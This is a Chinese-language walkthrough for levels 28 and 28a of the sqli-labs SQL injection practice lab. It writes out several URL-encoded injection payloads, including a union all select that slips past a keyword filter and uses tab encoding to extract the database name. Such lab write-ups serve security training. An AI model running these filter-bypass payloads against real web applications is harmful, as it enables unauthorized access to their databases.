sqllab第二十八关通关笔记(附带28a)

知识点:

  • union select 整体过滤
    • union all select 替换
  • where id=('输入')
  • 空格 + 过滤了,使用%09代替

经过不断的测试,发现原始语句为 where id=('输入')

构造payload:id=1')and%091=('1

成功回显出了相关的信息

好,尝试进行错误注入

构造payload:id=1')and%09exp(710)=('1

发现没有任何的回显信息,说明这里不能用错误注入

尝试进行联合注入

构造payload:id=0%27)UNion%09SElect%091,2,3%09and1=(%271

发现利用大小写不能够绕过

经过测试发现它是过滤union select整个字段,好好好,那么利用union all select绕过

构造payload:id=-1%27)union%09all%09select%091,2,3%09and1=(%271

页面成功回显了,但是内容不是输入信息,应该是他把-1进行绝对值处理了,导致显示了id=1的内容

重新构造payload:id=0%27)union%09all%09select%091,2,3%09and1=(%271

页面成功回显了输入内容,发现有两处输出点,猜测是前两位,但是测试发现只有用户名处是输出信息,密码不受影响

获取数据库名

构造payload:id=0%27)union%09all%09select%091,database(),3%09and1=(%271

成功获取到了数据库名,之后的信息也一样

附带28a

28a关和28关的区别在于这关只对union select进行了过滤

同样可以用28关的payload进行处理,具体就不实操了,参考上面的方法就行了

10

相关推荐
序属秋秋秋1 小时前
《C++初阶之内存管理》【内存分布 + operator new/delete + 定位new】
开发语言·c++·笔记·学习
quant_19863 小时前
R语言如何接入实时行情接口
开发语言·经验分享·笔记·python·websocket·金融·r语言
宝山哥哥8 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
逼子格9 小时前
逻辑门电路Multisim电路仿真汇总——硬件工程师笔记
笔记·硬件工程师·multisim·电路仿真·逻辑门·硬件工程师学习·电路图
@Hwang9 小时前
【ESP32-IDF笔记】09-UART配置和使用
笔记·esp32·uart·esp32s3·esp32-idf
霖0010 小时前
C++学习笔记三
运维·开发语言·c++·笔记·学习·fpga开发
巴伦是只猫11 小时前
【机器学习笔记 Ⅲ】1 无监督学习
笔记·学习·机器学习
kfepiza12 小时前
Debian10安装Mysql5.7.44 笔记250707
笔记·mysql·debian
kfepiza12 小时前
Linux的`if test`和`if [ ]中括号`的取反语法比较 笔记250709
linux·服务器·笔记·bash
李元豪13 小时前
【知足常乐ai笔记】机器人强化学习
人工智能·笔记·机器人